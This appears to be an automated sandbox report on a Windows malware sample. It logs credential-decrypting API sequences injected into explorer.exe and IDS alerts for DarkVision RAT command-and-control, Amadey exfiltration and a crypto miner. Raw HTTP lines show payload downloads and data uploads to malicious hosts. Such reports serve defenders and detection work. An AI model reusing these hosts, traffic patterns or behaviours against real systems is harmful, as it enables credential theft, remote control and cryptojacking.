Source: C:\Windows\explorer.exe | Code function: 35_2_027B6640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,35_2_027B6640
Source: C:\Windows\explorer.exe | Code function: 35_2_027BA4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027BA4A0
Source: C:\Windows\explorer.exe | Code function: 35_2_027B9AC0 CryptBinaryToStringW,RegGetValueW,35_2_027B9AC0
Source: C:\Windows\explorer.exe | Code function: 35_2_027B49D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B49D0
Source: C:\Windows\explorer.exe | Code function: 35_2_027B6E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,35_2_027B6E70
Source: C:\Windows\explorer.exe | Code function: 35_2_027B5E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,35_2_027B5E10
Source: C:\Windows\explorer.exe | Code function: 35_2_027B4FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B4FD0
Source: C:\Windows\explorer.exe | Code function: 35_2_027B4CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,35_2_027B4CD0
Source: C:\Windows\explorer.exe | Code function: 35_2_027B9D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,35_2_027B9D30
Source: C:\Windows\explorer.exe | Code function: 35_2_027BA7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,35_2_027BA7A0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B55D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,35_2_027B55D0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,35_2_027B9BF0
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B3E70 CryptStringToBinaryA,35_2_027B3E70
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9E4E CryptReleaseContext,CryptDestroyHash,35_2_027B9E4E
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9E27 CryptReleaseContext,CryptDestroyHash,35_2_027B9E27
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9EBF CryptReleaseContext,CryptDestroyHash,35_2_027B9EBF
                        Source: C:\Windows\explorer.exeCode function: 35_2_027B9E8A CryptReleaseContext,CryptDestroyHash,35_2_027B9E8A
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F52D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F52D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F6640 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,36_2_029F6640
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FA4A0 LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029FA4A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9AC0 CryptBinaryToStringW,RegGetValueW,36_2_029F9AC0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F49D0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F49D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F5E10 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,36_2_029F5E10
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F6E70 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,lstrlenW,LocalFree,LocalFree,36_2_029F6E70
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F4FD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F4FD0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F4CD0 SHGetKnownFolderPath,LocalAlloc,CreateFileW,GetFileSize,LocalAlloc,ReadFile,type_info::_name_internal_method,type_info::_name_internal_method,CryptUnprotectData,free,LocalFree,LocalFree,CoTaskMemFree,CloseHandle,LocalFree,CloseHandle,LocalFree,CoTaskMemFree,36_2_029F4CD0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9D30 CryptAcquireContextW,CryptCreateHash,WaitForSingleObject,CryptHashData,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,CryptReleaseContext,CryptDestroyHash,36_2_029F9D30
                        Source: C:\Windows\explorer.exeCode function: 36_2_029FA7A0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,LocalFree,36_2_029FA7A0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F55D0 LocalAlloc,wsprintfW,_snprintf,wsprintfW,wsprintfW,wsprintfW,CryptUnprotectData,wsprintfW,MultiByteToWideChar,wsprintfW,LocalFree,wsprintfW,wsprintfW,__ExceptionPtrDestroy,wsprintfW,LocalFree,LocalFree,lstrlenW,LocalFree,36_2_029F55D0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9BF0 CryptBinaryToStringW,RegOpenKeyW,RegSetValueExW,RegCloseKey,RegCloseKey,36_2_029F9BF0
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9E8A CryptReleaseContext,CryptDestroyHash,36_2_029F9E8A
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9EBF CryptReleaseContext,CryptDestroyHash,36_2_029F9EBF
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9E27 CryptReleaseContext,CryptDestroyHash,36_2_029F9E27
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F9E4E CryptReleaseContext,CryptDestroyHash,36_2_029F9E4E
                        Source: C:\Windows\explorer.exeCode function: 36_2_029F3E70 CryptStringToBinaryA,36_2_029F3E70

                        Exploits

                        Source: Yara match | File source: file.exe, type: SAMPLE
                        Source: Yara match | File source: 4.2.explorer.exe.be0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.0.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 0.2.file.exe.7c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara match | File source: 00000004.00000002.4653880983.0000000000C18000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000000.2115394584.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000003.2116236371.0000000002801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: 00000000.00000002.2119261652.0000000002800000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara match | File source: Process Memory Space: file.exe PID: 4152, type: MEMORYSTR
                        Source: Yara match | File source: Process Memory Space: explorer.exe PID: 5020, type: MEMORYSTR

                        Bitcoin Miner

                        Source: Yara match | File source: Process Memory Space: explorer.exe PID: 6196, type: MEMORYSTR
                        Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49708 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49712 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49738 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49756 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49775 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49804 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49823 version: TLS 1.2
                        Source: unknown | HTTPS traffic detected: 154.216.20.243:443 -> 192.168.2.6:49857 version: TLS 1.2
                        Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                        Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: WindosCPUsystem.exe, 00000008.00000003.2430713857.000001BBFD920000.00000004.00000001.00020000.00000000.sdmp, ggbfqxmgkimt.sys.8.dr
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007DCA90 WaitForSingleObject,LocalAlloc,wnsprintfW,LocalAlloc,FindFirstFileW,WaitForSingleObject,lstrcmpW,lstrcmpW,LocalAlloc,wnsprintfW,RemoveDirectoryW,GetLastError,LocalFree,wnsprintfW,DeleteFileW,FindNextFileW,FindClose,GetLastError,LocalFree,LocalFree,0_2_007DCA90
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007D3620 _memset,_memset,SHGetKnownFolderPath,lstrlenW,__snwprintf,__snwprintf,CoTaskMemFree,_memset,__snwprintf,FindFirstFileW,_memset,__snwprintf,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,0_2_007D3620
                        Source: C:\Windows\explorer.exe | Code function: 4_2_00BE97F0 SHGetKnownFolderPath,lstrlenW,CoTaskMemFree,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,GetFileAttributesW,RemoveDirectoryW,Sleep,4_2_00BE97F0
                        Source: C:\Windows\explorer.exe | Code function: 33_2_01397FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,33_2_01397FB0
                        Source: C:\Windows\explorer.exe | Code function: 35_2_027B7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,35_2_027B7FB0
                        Source: C:\Windows\explorer.exe | Code function: 36_2_029F7FB0 LocalAlloc,StrCmpNIW,LocalAlloc,LocalAlloc,LocalAlloc,FindFirstFileW,lstrcmpiW,lstrcmpiW,LocalAlloc,GetTempPathW,LocalAlloc,GetTickCount,CopyFileW,CreateFileW,GetFileSize,LocalAlloc,ReadFile,CloseHandle,LocalFree,CloseHandle,DeleteFileW,LocalFree,LocalFree,FindNextFileW,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,lstrlenW,36_2_029F7FB0

                        Networking

                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49721 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49709 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49714 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49750 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49711 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49728 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49737 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:49709 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49894 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49909 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49916 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49922 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49903 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49930 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:49882 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:49882 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50015 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50018 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50017 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50020 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50016 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50019 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50023 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045618 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M1 : 192.168.2.6:50014 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:50023 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2045619 - Severity 1 - ET MALWARE Win32/DarkVision RAT CnC Checkin M3 : 192.168.2.6:50014 -> 185.157.162.216:5200
                        Source: Network traffic | Suricata IDS: 2022482 - Severity 1 - ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01 : 192.168.2.6:49756 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2021954 - Severity 1 - ET MALWARE JS/Nemucod.M.gen downloading EXE payload : 154.216.20.243:443 -> 192.168.2.6:49756
                        Source: Network traffic | Suricata IDS: 2044697 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M3 : 192.168.2.6:49774 -> 154.216.20.243:443
                        Source: C:\Windows\explorer.exe | Network Connect: 154.216.20.243 443
                        Source: C:\Windows\explorer.exe | Network Connect: 37.203.243.102 3333
                        Source: C:\Windows\explorer.exe | Network Connect: 185.157.162.216 5200
                        Source: Malware configuration extractor | IPs: 185.157.162.216
                        Source: global traffic | TCP traffic: 192.168.2.6:49709 -> 185.157.162.216:5200
                        Source: global traffic | TCP traffic: 192.168.2.6:49773 -> 37.203.243.102:3333
                        Source: Joe Sandbox View | ASN Name: DAPLDATAPLANETLtdRU DAPLDATAPLANETLtdRU
                        Source: Joe Sandbox View | ASN Name: OBE-EUROPEObenetworkEuropeSE OBE-EUROPEObenetworkEuropeSE
                        Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49708 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49715 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49738 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49756 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:64191 -> 1.1.1.1:53
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49775 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49804 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49823 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49857 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:50012 -> 154.216.20.243:443
                        Source: Network traffic | Suricata IDS: 2051004 - Severity 2 - ET MALWARE [ANY.RUN] SilentCryptoMiner Check-in POST Request : 192.168.2.6:50021 -> 154.216.20.243:443
                        Source: global traffic | HTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: woo097878781.win
                        Source: global traffic | HTTP traffic detected: GET /64.EXE HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Host: woo097878781.win
                        Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: woo097878781.win | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 419
                        Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: woo097878781.win | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 414
                        Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: woo097878781.win | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 538
                        Source: global traffic | HTTP traffic detected: POST /upload.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=part | Host: woo097878781.win | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Content-Length: 533
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: unknown | TCP traffic detected without corresponding DNS query: 185.157.162.216
                        Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_007E1580 WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,setsockopt,setsockopt,WSACreateEvent,WSAEventSelect,CloseHandle,shutdown,closesocket,WaitForMultipleObjects,WaitForSingleObject,WaitForSingleObject,WSAEnumNetworkEvents,shutdown,closesocket,CloseHandle,recv,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,shutdown,closesocket,CloseHandle,WaitForSingleObject,shutdown,closesocket,CloseHandle,shutdown,closesocket,shutdown,closesocket,CloseHandle,shutdown,closesocket,LocalFree,0_2_007E1580
                        Source: global traffic | HTTP traffic detected: GET /WindosCPUsystem.exe HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 | Host: woo097878781.win
                        Source: global traffic | HTTP traffic detected: GET /64.EXE HTTP/1.1 | Connection: Keep-Alive | Accept: */* | User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:64.0) Gecko/20100101 Firefox/64.0 | Host: woo097878781.win
                        Source: global traffic | DNS traffic detected: DNS query: woo097878781.win
                        Source: global traffic | DNS traffic detected: DNS query: pool.hashvault.pro
                        Source: unknown | HTTP traffic detected: POST /66/api/endpoint.php HTTP/1.1 | Accept: */* | Connection: close | Content-Length: 307 | Content-Type: application/json | Host: woo097878781.win | User-Agent: cpp-httplib/0.12.6
